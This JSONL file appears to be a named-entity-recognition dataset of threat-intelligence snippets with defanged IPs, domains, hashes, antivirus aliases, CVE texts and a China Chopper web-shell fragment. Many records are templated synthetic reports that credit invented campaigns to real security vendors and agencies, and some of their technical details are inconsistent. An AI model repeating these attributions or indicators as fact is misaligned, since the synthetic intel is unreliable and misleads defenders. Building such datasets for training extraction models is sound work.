{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.1938 W32[.]Virut[.]CF Win32/Virut.17408 PE_VIRUX.Q Win.Trojan.Virut-377 Virus.Win32.Virut.q Virus.Win32.Virut.hpeg W32.Virut.l5he Virus.Win32.Virut.Ce Win32.Virut.5 PE_VIRUX.Q Win32/Virut.bn Virus/Win32.Virut.ce Win32.Virut.cr.61440 Virus:Win32/Virut.BN Virus.Win32.Virut.q Win32/Virut.F Virus.Virut.13 Win32/Virut.NBP Backdoor.Win32.DsBot W32/Virut.CE W32/Sality.AO Win32/Virus.VirutChangeEntry.H", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.Virut.CF": [[96, 112]]}, "info": {"id": "cyner2_train_001902", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: fix node corruption in ar->arvifs list\n\nIn current WLAN recovery code flow, ath12k_core_halt() only reinitializes\nthe \"arvifs\" list head. This will cause the list node immediately following\nthe list head to become an invalid list node. Because the prev of that node\nstill points to the list head \"arvifs\", but the next of the list head\n\"arvifs\" no longer points to that list node.\n\nWhen a WLAN recovery occurs during the execution of a vif removal, and it\nhappens before the spin_lock_bh(&ar->data_lock) in\nath12k_mac_vdev_delete(), list_del() will detect the previously mentioned\nsituation, thereby triggering a kernel panic.\n\nThe fix is to remove and reinitialize all vif list nodes from the list head\n\"arvifs\" during WLAN halt. The reinitialization is to make the list nodes\nvalid, ensuring that the list_del() in ath12k_mac_vdev_delete() can execute\nnormally.\n\nCall trace:\n__list_del_entry_valid_or_report+0xd4/0x100 (P)\nath12k_mac_remove_link_interface.isra.0+0xf8/0x2e4 [ath12k]\nath12k_scan_vdev_clean_work+0x40/0x164 [ath12k]\ncfg80211_wiphy_work+0xfc/0x100\nprocess_one_work+0x164/0x2d0\nworker_thread+0x254/0x380\nkthread+0xfc/0x100\nret_from_fork+0x10/0x20\n\nThe change is mostly copied from the ath11k patch:\nhxxps://lore[ . ]kernel[ . ]org/all/20250320053145.3445187-1-quic_stonez@quicinc.com/\n\nTested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.4.1-00199-QCAHKSWPL_SILICONZ-1", "spans": {"Indicator: https://lore.kernel.org/all/20250320053145.3445187-1-quic_stonez@quicinc.com/": [[1297, 1382]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-38290"}}
{"text": "In a 5-month timespan , actor managed to create a Trojan from scratch which will presumably continue evolving offering new features such as keylogging , back-connect proxy or RAT capabilities . They also identified broadly similar TTPs being used in the attack against a U.S law firm specializing in intellectual property law . We also identified www[.]gokickes[.]com was the C2 of another Invader variant ( 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb ) .", "spans": {"Organization: They": [[194, 198]], "Indicator: www.gokickes.com": [[347, 367]], "Malware: Invader variant": [[390, 405]], "Indicator: 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb": [[408, 472]]}, "info": {"id": "cyberner_stix_train_003620", "source": "defanged_augment"}}
{"text": "Path – location of the root “ stash ” directory Ext – search for files with one of these extensions only Date – search for files not earlier than this date Internal name : NvCpld[.]dll ( from export table ) , msdetltemp[ . ]dll ( from resources ) , IGFSRVC[ . ]dll ( from resources ) File format : PE32 DLL File size : 76,288 bytes MD5s : 8b238931a7f64fddcad3057a96855f6c , ce151285e8f0e7b2b90162ba171a4b90 Linker version : 11.0 , Microsoft Visual Studio Linker timestamps : 2015.05.29 11:20:32 ( GMT ) , 2006.11.25 04:39:15 ( GMT ) Exported functions :", "spans": {"Indicator: NvCpld.dll": [[172, 184]], "Indicator: msdetltemp.dll": [[209, 227]], "Indicator: IGFSRVC.dll": [[249, 264]], "Indicator: 8b238931a7f64fddcad3057a96855f6c": [[339, 371]], "Indicator: ce151285e8f0e7b2b90162ba171a4b90": [[374, 406]], "Organization: Microsoft": [[431, 440]]}, "info": {"id": "cyberner_stix_train_001866", "source": "defanged_augment"}}
{"text": "Blog Post by Tenable: Tracking Aqua Blizzard's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2024-19363 against Microsoft Exchange deployments. The initial access vector involves spear-phishing emails from noreply@secure-verify[ . ]net delivering Conti. Post-compromise, the attackers deploy QakBot and use Hashcat for reconnaissance. C2 infrastructure includes 165 [ . ] 221 [ . ] 19 [ . ] 163 and auth-data[.]net. A staging server at hxxps://gateway-gateway[.]cc/callback hosts additional tooling. Key artifact: C:\\Users\\admin\\Downloads\\agent.py (SHA256: d8af6d83bde0ff03c5ed2671f598fa20dd0ac3a3b72d4c8c12bb3df461d4fd1d).", "spans": {"Organization: Tenable": [[13, 20]], "Vulnerability: CVE-2024-19363": [[124, 138]], "System: Microsoft Exchange": [[147, 165]], "Indicator: noreply@secure-verify.net": [[241, 270]], "Malware: Conti": [[282, 287]], "Malware: QakBot": [[327, 333]], "Indicator: 165.221.19.163": [[397, 429]], "Indicator: auth-data.net": [[434, 449]], "Indicator: https://gateway-gateway.cc/callback": [[471, 508]], "Indicator: d8af6d83bde0ff03c5ed2671f598fa20dd0ac3a3b72d4c8c12bb3df461d4fd1d": [[592, 656]]}, "info": {"id": "synth_v2_01507", "source": "defanged_augment"}}
{"text": "Yet our statistics says that about 60 % of Android users are still sitting with Android 4.4.2 and below . The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests . The backdoor was delivered via a malicious [.]rtf file that exploited CVE-2017-0199 .", "spans": {"System: Android": [[43, 50]], "System: Android 4.4.2 and below": [[80, 103]], "Organization: Symantec": [[155, 163]], "Vulnerability: (CVE-2019-0703)": [[164, 179]], "Indicator: .rtf file": [[295, 306]], "Vulnerability: CVE-2017-0199": [[322, 335]]}, "info": {"id": "cyberner_stix_train_001198", "source": "defanged_augment"}}
{"text": "Artifact Analysis for BlackCat campaign:\nStage 1 dropper at /home/user/.config/winlogon.exe - MD5: ad2253dd51db543d594e713e75cedeee\nStage 2 loader at C:\\Users\\admin\\Desktop\\dropper.ps1 - MD5: 7ed5841f11f87eed42aaf9f108a3ac3b\nFinal payload at /home/user/.config/agent.py - MD5: 06f949d97f49cf09adccd55b5df69fa4\nExfiltration module - SHA1: d02e72587a62f6b7bccc22985ae5833cb917ddea\nAll stages communicated with 60 [ . ] 100 [ . ] 107 [ . ] 211. Covenant signatures detected in Stage 2.", "spans": {"Malware: BlackCat": [[22, 30]], "Indicator: ad2253dd51db543d594e713e75cedeee": [[99, 131]], "Indicator: 7ed5841f11f87eed42aaf9f108a3ac3b": [[192, 224]], "Indicator: 06f949d97f49cf09adccd55b5df69fa4": [[277, 309]], "Indicator: d02e72587a62f6b7bccc22985ae5833cb917ddea": [[338, 378]], "Indicator: 60.100.107.211": [[408, 440]]}, "info": {"id": "synth_v2_01877", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Cobalt Strike (SHA256: ce61355c704f0b1b6de291d93d6b8191230b4adadc6fcb8c660e98acb3e344df). Upon execution on Apache Struts, the sample creates C:\\Users\\Public\\Documents\\config.dat and injects into legitimate processes. Network analysis shows beaconing to 192[.]150[.]190[.]159 every 60 seconds and DNS queries to securegateway[.]org. The second stage was fetched from hxxp://node-login[.]club/secure/token and written to C:\\Windows\\Temp\\beacon.dll. The payload uses SharpHound-style techniques for defense evasion. A secondary hash (SHA1: 11f2517e8b3be34112c61234c09bd4369494e438) was extracted from the unpacked payload.", "spans": {"Malware: Cobalt Strike": [[25, 38]], "Indicator: ce61355c704f0b1b6de291d93d6b8191230b4adadc6fcb8c660e98acb3e344df": [[48, 112]], "System: Apache Struts": [[133, 146]], "Indicator: 192.150.190.159": [[279, 300]], "Indicator: securegateway.org": [[337, 356]], "Indicator: hxxp://node-login.club/secure/token": [[392, 429]], "Indicator: 11f2517e8b3be34112c61234c09bd4369494e438": [[563, 603]]}, "info": {"id": "synth_v2_00496", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.Zlob.60259 Trojan.NSIS.StartPage.Q Trojan.Zlob.60259 Win32/SillyDl.YHD Win.Trojan.NSIS-38 Trojan-Downloader[.]Win32[.]NSIS[.]io Trojan.Zlob.60259 Riskware.Nsis.Adw.cxexqq Troj.Downloader.W32.Lipler.lkqh Trojan.Zlob.60259 Trojan.Fakealert.26734 BehavesLike.Win32.AdwareSearchProtect.kc TrojanDownloader:Win32/Gabeerf.A Trojan.Zlob.DEB63 Trojan.Win32.Banker.140384 Trojan.Zlob.60259 Trojan/Win32.StartPage.R26935 Trojan.NSIS", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Trojan-Downloader.Win32.NSIS.io": [[123, 160]]}, "info": {"id": "cyner2_train_003060", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.Emotet TSPY_EMOTET.SMZD172 Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_EMOTET.SMZD172 Trojan.Packed2.40646 Trojan.Dovs.Win32.2068 BehavesLike[.]Win32[.]Backdoor[.]ch W32.Trojan.Emotet Trojan:Win32/Emotet.R!bit Trojan.Razy.D36CE4 Trojan/Win32.Emotet.R215266 Trojan.Win32.Emotet", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Backdoor.ch": [[167, 202]]}, "info": {"id": "cyner2_train_002771", "source": "defanged_augment"}}
{"text": "Malware code showing onCreate method Figure 9. onCreate method of the main class decrypting the payload Next , the malware-defined function decryptAssetToDex ( a meaningful name we assigned during analysis ) receives the string “ CuffGmrQRT ” as the first argument , which is the name of the encrypted file stored in the Assets folder . backdoors that now appear to be part of APT15 's toolset . It turns out that the first ZIP structure is for the image file order[ . ]jpg while the second one is for an executable file SHIPPING_MX00034900_PL_INV_pdf[ . ]exe . Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers , plus he 's accused of making ransom demands through deploying ransomware .", "spans": {"Indicator: order.jpg": [[460, 473]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.exe": [[521, 559]], "Organization: Astamirov": [[562, 571]]}, "info": {"id": "cyberner_stix_train_001489", "source": "defanged_augment"}}
{"text": "China Chopper web shell files named error404[ . ]aspx included the \"eval (Request.Item[\"|\"] ,\"unsafe\" ) ; \" string .", "spans": {"Indicator: error404.aspx": [[36, 53]]}, "info": {"id": "cyberner_stix_train_007485", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed GhostPack artifacts at C:\\Users\\admin\\Desktop\\update.dll. Memory dump analysis confirmed execution of Sharphound. Registry modifications pointed to persistence via C:\\Users\\Public\\Documents\\sam.hive. Network forensics identified connections to 10 [ . ] 39 [ . ] 235 [ . ] 90 and portal-relay[.]cc. Email headers traced the initial vector to hr@document-share[ . ]link. File C:\\Windows\\Temp\\runtime.dll (SHA1: 00b472a7ef475a63668c17948525561e7c369d96) was identified as the initial dropper. A staging URL hxxp://proxy-edge[ . ]site/panel/index.html resolved to 192 [ . ] 20 [ . ] 53 [ . ] 113. Secondary artifact hash: MD5: c48b4cf283597b4f25d38ba6bf4eff08.", "spans": {"Indicator: 10.39.235.90": [[316, 346]], "Indicator: portal-relay.cc": [[351, 368]], "Indicator: hr@document-share.link": [[413, 439]], "Indicator: 00b472a7ef475a63668c17948525561e7c369d96": [[481, 521]], "Indicator: hxxp://proxy-edge.site/panel/index.html": [[576, 619]], "Indicator: 192.20.53.113": [[632, 663]], "Indicator: c48b4cf283597b4f25d38ba6bf4eff08": [[695, 727]]}, "info": {"id": "synth_v2_01179", "source": "defanged_augment"}}
{"text": "Artifact Analysis for BlackCat campaign:\nStage 1 dropper at /opt/app/bin/svchost.exe - SHA1: 8498928683e518848806498c06fd5f219ffa8f29\nStage 2 loader at C:\\Users\\admin\\Downloads\\agent.py - MD5: f777fb8697e4f3b539f80a75c6f3ec77\nFinal payload at C:\\Windows\\System32\\backdoor.elf - MD5: 65cd672c78f04296256846274558684b\nExfiltration module - SHA1: 1f075a3e3de862d313f97963563cf8a5997d98d2\nAll stages communicated with 10[.]191[.]91[.]59. Sliver signatures detected in Stage 2.", "spans": {"Malware: BlackCat": [[22, 30]], "Indicator: 8498928683e518848806498c06fd5f219ffa8f29": [[93, 133]], "Indicator: f777fb8697e4f3b539f80a75c6f3ec77": [[193, 225]], "Indicator: 65cd672c78f04296256846274558684b": [[283, 315]], "Indicator: 1f075a3e3de862d313f97963563cf8a5997d98d2": [[344, 384]], "Indicator: 10.191.91.59": [[414, 432]]}, "info": {"id": "synth_v2_01971", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan/Downloader.Delf.quw Win32.Trojan.WisdomEyes.16070401.9500.9770 Win.Trojan.Downloader-57555 Trojan.DownLoad2.37645 BehavesLike[.]Win32[.]PUPXAS[.]ch Trojan.Graftor.D1EFD7 TrojanDownloader:Win32/Blortios.C Trojan/Win32.Downloader.R18903 Win32/Trojan.88b", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.PUPXAS.ch": [[147, 180]]}, "info": {"id": "cyner2_train_002164", "source": "defanged_augment"}}
{"text": "Blog Post by Mandiant: Tracking BlackTech's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2026-10752 against Atlassian Confluence deployments. The initial access vector involves spear-phishing emails from hr@account-update[.]xyz delivering Latrodectus. Post-compromise, the attackers deploy TrickBot and use Impacket for reconnaissance. C2 infrastructure includes 126[.]21[.]87[.]103 and edgeportal[.]live. A staging server at hxxps://cdnsync[.]info/api/v2/auth hosts additional tooling. Key artifact: /usr/local/bin/payload.bin (MD5: ccab949c2f8d2f57b2e0033abed3fd1e).", "spans": {"Organization: Mandiant": [[13, 21]], "Vulnerability: CVE-2026-10752": [[121, 135]], "System: Atlassian Confluence": [[144, 164]], "Indicator: hr@account-update.xyz": [[240, 263]], "Malware: Latrodectus": [[275, 286]], "Malware: TrickBot": [[326, 334]], "Indicator: 126.21.87.103": [[399, 418]], "Indicator: edgeportal.live": [[423, 440]], "Indicator: https://cdnsync.info/api/v2/auth": [[462, 496]], "Indicator: ccab949c2f8d2f57b2e0033abed3fd1e": [[570, 602]]}, "info": {"id": "synth_v2_01637", "source": "defanged_augment"}}
{"text": "At the same time , the lack of encryption , use of a public FTP server and the low opsec level could indicate that less skilled attackers are behind the malware . This campaign , dubbed Operation GhostSecret , leverages multiple implants , tools , and malware variants associated with the state-sponsored cyber group HIDDEN COBRA . This tool was then installed to csidl_profile\\appdata\\roaming\\adobe\\ftp[ . ]exe . Adversaries may manipulate physical process control within the industrial environment .", "spans": {"Indicator: csidl_profile\\appdata\\roaming\\adobe\\ftp.exe": [[364, 411]]}, "info": {"id": "cyberner_stix_train_005991", "source": "defanged_augment"}}
{"text": "Blog Post by Huntress: Tracking Salt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-19144 against Ubuntu 22.04 deployments. The initial access vector involves spear-phishing emails from ceo@login-portal[ . ]tech delivering SmokeLoader. Post-compromise, the attackers deploy NjRAT and use LaZagne for reconnaissance. C2 infrastructure includes 109 [ . ] 81 [ . ] 57 [ . ] 51 and gatewayapi[ . ]site. A staging server at hxxp://portalapi[ . ]tech/assets/js/payload.js hosts additional tooling. Key artifact: C:\\Windows\\System32\\payload.bin (MD5: da530bbbb0018619e5581fe65b72dc5a).", "spans": {"Organization: Huntress": [[13, 21]], "Vulnerability: CVE-2020-19144": [[124, 138]], "System: Ubuntu 22.04": [[147, 159]], "Indicator: ceo@login-portal.tech": [[235, 260]], "Malware: SmokeLoader": [[272, 283]], "Malware: NjRAT": [[323, 328]], "Indicator: 109.81.57.51": [[392, 422]], "Indicator: gatewayapi.site": [[427, 446]], "Indicator: hxxp://portalapi.tech/assets/js/payload.js": [[468, 514]], "Indicator: da530bbbb0018619e5581fe65b72dc5a": [[593, 625]]}, "info": {"id": "synth_v2_01504", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Gootloader (MD5: 0fa957d45d185b9ead181417bbe49afc). Upon execution on Cisco ASA, the sample creates C:\\Windows\\System32\\shell.php and injects into legitimate processes. Network analysis shows beaconing to 10 [ . ] 108 [ . ] 155 [ . ] 38 every 60 seconds and DNS queries to sync-mail[ . ]club. The second stage was fetched from hxxp://proxystatic[.]dev/secure/token and written to /opt/app/bin/loader.exe. The payload uses Chisel-style techniques for defense evasion. A secondary hash (MD5: b9980573972767191297fb77de215e3d) was extracted from the unpacked payload.", "spans": {"Malware: Gootloader": [[25, 35]], "Indicator: 0fa957d45d185b9ead181417bbe49afc": [[42, 74]], "System: Cisco ASA": [[95, 104]], "Indicator: 10.108.155.38": [[230, 261]], "Indicator: sync-mail.club": [[298, 316]], "Indicator: hxxp://proxystatic.dev/secure/token": [[352, 389]], "Indicator: b9980573972767191297fb77de215e3d": [[515, 547]]}, "info": {"id": "synth_v2_00476", "source": "defanged_augment"}}
{"text": "] top/ Oct 17 , 2017 hxxp : //online[.]bankaustria[.]at.id87721 [ . The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials . APT28 is a threat group that has been attributed to Russia's Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment .", "spans": {"Organization: Russia's Main Intelligence Directorate of the Russian General Staff": [[267, 334]], "Organization: U.S. Department of Justice": [[350, 376]], "Indicator: online.bankaustria.at": [[30, 55]]}, "info": {"id": "cyberner_stix_train_007071", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2024-27546 is a critical CSRF vulnerability affecting Zyxel USG. FireEye confirmed active exploitation by APT28 in the wild. Exploitation delivers DarkSide (SHA1: 9d45cb8714ddb217127203a99a9d34e8ecc69384) which is dropped to C:\\Windows\\Tasks\\agent.py. The exploit payload is hosted at hxxp://gateway-portal[ . ]tech/panel/index.html and communicates to 10 [ . ] 109 [ . ] 18 [ . ] 76 for C2.", "spans": {"Vulnerability: CVE-2024-27546": [[24, 38]], "Vulnerability: CSRF vulnerability": [[53, 71]], "System: Zyxel USG": [[82, 91]], "Organization: FireEye": [[93, 100]], "Malware: DarkSide": [[175, 183]], "Indicator: 9d45cb8714ddb217127203a99a9d34e8ecc69384": [[191, 231]], "Indicator: hxxp://gateway-portal.tech/panel/index.html": [[313, 360]], "Indicator: 10.109.18.76": [[381, 411]]}, "info": {"id": "synth_v2_00719", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Vidar campaign:\nStage 1 dropper at /usr/local/bin/helper.sh - MD5: 07f736a1593ac1ad8eb9c3ce52fb15de\nStage 2 loader at /dev/shm/ntds.dit - SHA1: c3cddbb88cd35ac6f32ca267d773962a262bc475\nFinal payload at /tmp/ntds.dit - SHA1: 0a9336c606e9a3158a2bd171c55682923ea825ba\nExfiltration module - SHA1: 0a82c2bda4cb8dba6d94974fb7370f24e5412951\nAll stages communicated with 25[.]39[.]236[.]208. Rubeus signatures detected in Stage 2.", "spans": {"Malware: Vidar": [[22, 27]], "Indicator: 07f736a1593ac1ad8eb9c3ce52fb15de": [[89, 121]], "Indicator: c3cddbb88cd35ac6f32ca267d773962a262bc475": [[166, 206]], "Indicator: 0a9336c606e9a3158a2bd171c55682923ea825ba": [[246, 286]], "Indicator: 0a82c2bda4cb8dba6d94974fb7370f24e5412951": [[315, 355]], "Indicator: 25.39.236.208": [[385, 404]]}, "info": {"id": "synth_v2_01867", "source": "defanged_augment"}}
{"text": "Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions). Supported versions that are affected are 5 [ . ] 5 [ . ] 0 [ . ] 0.0, 12 [ . ] 2 [ . ] 1 [ . ] 3.0 and 12 [ . ] 2 [ . ] 1 [ . ] 4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).", "spans": {"Indicator: 5.5.0.0": [[178, 203]], "Indicator: 12.2.1.3": [[207, 233]], "Indicator: 12.2.1.4": [[240, 266]], "Organization: Oracle": [[21, 27], [80, 86], [377, 383], [543, 549], [757, 763], [872, 878]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-2191"}}
{"text": "Malware Analysis Report: Latrodectus (MD5: 92d82a0eaa8956ed8b6e0f15d703680a). Upon execution on SonicWall SMA, the sample creates /home/user/.config/payload.bin and injects into legitimate processes. Network analysis shows beaconing to 192[.]175[.]134[.]17 every 60 seconds and DNS queries to gatewayupdate[.]io. The second stage was fetched from hxxps://auth-data[ . ]online/api/v2/auth and written to /etc/cron.d/agent.py. The payload uses Brute Ratel-style techniques for defense evasion. A secondary hash (SHA1: 9c990507e7d51e1b1122226c0cc41b47df3af991) was extracted from the unpacked payload.", "spans": {"Malware: Latrodectus": [[25, 36]], "Indicator: 92d82a0eaa8956ed8b6e0f15d703680a": [[43, 75]], "System: SonicWall SMA": [[96, 109]], "Indicator: 192.175.134.17": [[236, 256]], "Indicator: gatewayupdate.io": [[293, 311]], "Indicator: hxxps://auth-data.online/api/v2/auth": [[347, 387]], "Indicator: 9c990507e7d51e1b1122226c0cc41b47df3af991": [[516, 556]]}, "info": {"id": "synth_v2_00502", "source": "defanged_augment"}}
{"text": "Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet <hxxps://github[.]com/CachetHQ/Cachet> is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.", "spans": {"Indicator: https://github.com/CachetHQ/Cachet": [[347, 383]], "Vulnerability: SQL injection": [[92, 105]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-39165"}}
{"text": "] com , points to the IP address 54[.]69[.]156[.]31 which serves a self-signed TLS certificate with the certificate common name MyCert and fingerprint 11:41:45:2F : A7:07:23:54 : AE:9A : CE : F4 : FE:56 : AE : AC : B1 : C2:15:9F:6A : FC:1E : CC:7D : F8:61 : E3:25:26:73:6A . The Taidoor attackers have been actively engaging in targeted attacks since at least March 4 , 2009 . Decodes the Base64 payload and writes the file to C:\\ProgramData\\IntegratedOffice[.]exe . First , the discovery of new OT malware presents an immediate threat to affected organizations , since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon .", "spans": {"Indicator: C:\\ProgramData\\IntegratedOffice.exe": [[427, 464]], "Malware: OT malware": [[496, 506]], "Indicator: 54.69.156.31": [[33, 51]]}, "info": {"id": "cyberner_stix_train_004169", "source": "defanged_augment"}}
{"text": "We detonated the file in VxStream ’s automated malware analysis capability and found testproj[ . ]exe dropped a benign Microsoft Word document that pulls a jpg file from treestower[.]com .", "spans": {"Indicator: testproj.exe": [[85, 101]], "Organization: Microsoft": [[119, 128]], "Indicator: treestower.com": [[170, 186]]}, "info": {"id": "cyberner_stix_train_006782", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmack: tcp: ipv4, fix incorrect labeling\n\nCurrently, Smack mirrors the label of incoming tcp/ipv4 connections:\nwhen a label 'foo' connects to a label 'bar' with tcp/ipv4,\n'foo' always gets 'foo' in returned ipv4 packets. So,\n1) returned packets are incorrectly labeled ('foo' instead of 'bar')\n2) 'bar' can write to 'foo' without being authorized to write.\n\nHere is a scenario how to see this:\n\n* Take two machines, let's call them C and S,\n   with active Smack in the default state\n   (no settings, no rules, no labeled hosts, only builtin labels)\n\n* At S, add Smack rule 'foo bar w'\n   (labels 'foo' and 'bar' are instantiated at S at this moment)\n\n* At S, at label 'bar', launch a program\n   that listens for incoming tcp/ipv4 connections\n\n* From C, at label 'foo', connect to the listener at S.\n   (label 'foo' is instantiated at C at this moment)\n   Connection succeedes and works.\n\n* Send some data in both directions.\n* Collect network traffic of this connection.\n\nAll packets in both directions are labeled with the CIPSO\nof the label 'foo'. Hence, label 'bar' writes to 'foo' without\nbeing authorized, and even without ever being known at C.\n\nIf anybody cares: exactly the same happens with DCCP.\n\nThis behavior 1st manifested in release 2[.]6[.]29[.]4 (see Fixes below)\nand it looks unintentional. At least, no explanation was provided.\n\nI changed returned packes label into the 'bar',\nto bring it into line with the Smack documentation claims.", "spans": {"Indicator: 2.6.29.4": [[1316, 1330]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-47659"}}
{"text": "com.bmm.mobilebankingapp net.bnpparibas.mescomptes fr.banquepopulaire.cyberplus com.caisseepargne.android.mobilebanking com.palatine.android.mobilebanking.prod com.ocito.cdn.activity.creditdunord com.fullsix.android.labanquepostale.accountaccess mobi.societegenerale.mobile.lappli com.db.businessline.cardapp com.skh.android.mbanking com.ifs.banking.fiid1491 Truvasys has been involved in several attack campaigns , where it has masqueraded as one of server common computer utilities , including WinUtils , TrueCrypt , WinRAR , or SanDisk . It is distributed in a spear phishing campaign with a weaponized office document that appears to be designed to lure military personnel . The injected code calls out a first domain ( seen above encoded in Base64 ) and generates a Base64 response : Decoding it reveals a URL pointing to the actual skimming code , which is heavily obfuscated ( likely via obfuscator[ . ]io ): The data exfiltration is also done differently as seen in the image below .", "spans": {"Organization: computer utilities": [[465, 483]], "Organization: WinUtils": [[496, 504]], "Organization: TrueCrypt": [[507, 516]], "Organization: WinRAR": [[519, 525]], "Organization: SanDisk": [[531, 538]], "Indicator: obfuscator.io": [[894, 911]]}, "info": {"id": "cyberner_stix_train_001859", "source": "defanged_augment"}}
{"text": "Europol published a threat intelligence report linking Kimsuky to a new campaign exploiting CVE-2026-44676 in Atlassian Confluence. The attackers deployed Hive via LinPEAS, establishing C2 communication with 33 [ . ] 120 [ . ] 51 [ . ] 73 and staticbackup[ . ]club. A secondary payload was downloaded from hxxps://cache-cache[.]tech/callback. The malware binary (SHA256: 4c92d14cbaaa3222a41a0622e72512b5a2e953bc1469e6c46bc6c22ff073bbff) was dropped to C:\\Windows\\Temp\\winlogon.exe. Phishing emails were sent from helpdesk@login-portal[.]tech targeting enterprise users. A backup C2 server was identified at 10 [ . ] 162 [ . ] 248 [ . ] 116.", "spans": {"Organization: Europol": [[0, 7]], "Vulnerability: CVE-2026-44676": [[92, 106]], "System: Atlassian Confluence": [[110, 130]], "Malware: Hive": [[155, 159]], "Indicator: 33.120.51.73": [[208, 238]], "Indicator: staticbackup.club": [[243, 264]], "Indicator: https://cache-cache.tech/callback": [[306, 341]], "Indicator: 4c92d14cbaaa3222a41a0622e72512b5a2e953bc1469e6c46bc6c22ff073bbff": [[371, 435]], "Indicator: helpdesk@login-portal.tech": [[513, 541]], "Indicator: 10.162.248.116": [[607, 639]]}, "info": {"id": "synth_v2_00152", "source": "defanged_augment"}}
{"text": "The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server . DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32[ . ]tsp ' that provides remote control , belonging to this category .", "spans": {"Malware: DarkPulsar": [[156, 166]], "Malware: backdoor": [[237, 245]], "Indicator: sipauth32.tsp": [[254, 271]]}, "info": {"id": "cyberner_stix_train_001600", "source": "defanged_augment"}}
{"text": "Exploitation of CVE-2021-21972 was attributed to APT29 targeting Windows 11 instances. The exploit payload was served from 179[.]152[.]145[.]170 and communicated with cdn-delivery[[.]]xyz for command-and-control. Post-exploitation, a webshell (SHA256: 92376589330387034357d5813804d154b6a63c47dd17e2d78055be3fc0bb95bb) was deployed to /home/www-data/.ssh/authorized_keys2.", "spans": {"Vulnerability: CVE-2021-21972": [[16, 30]], "System: Windows 11": [[65, 75]], "Indicator: 179.152.145.170": [[123, 144]], "Indicator: cdn-delivery[.]xyz": [[167, 187]], "Indicator: 92376589330387034357d5813804d154b6a63c47dd17e2d78055be3fc0bb95bb": [[252, 316]]}, "info": {"id": "synth_00080", "source": "defanged_augment"}}
{"text": "RemcosRAT executable (SHA256: 667b71e6f8389bf64ec8db65407fec3a449f055d6be8e1e27763532489f68ce2, MD5: d4302d76d91af8bc39ef48d8a2f7ba86) was identified by threatcat_ch. RemcosRAT is a commercial remote administration tool commonly abused by threat actors. This sample connects to remcos-panel[ . ]zapto[ . ]org:4782 for command and control, and exfiltrates stolen data to ftp://upload[.]malicioushost[.]ru/drops/.", "spans": {"Malware: RemcosRAT": [[0, 9], [167, 176]], "Indicator: 667b71e6f8389bf64ec8db65407fec3a449f055d6be8e1e27763532489f68ce2": [[30, 94]], "Indicator: d4302d76d91af8bc39ef48d8a2f7ba86": [[101, 133]], "Indicator: remcos-panel.zapto.org": [[278, 308]], "Indicator: ftp://upload.malicioushost.ru/drops/": [[370, 410]]}, "info": {"id": "otx_00010", "source": "defanged_augment"}}
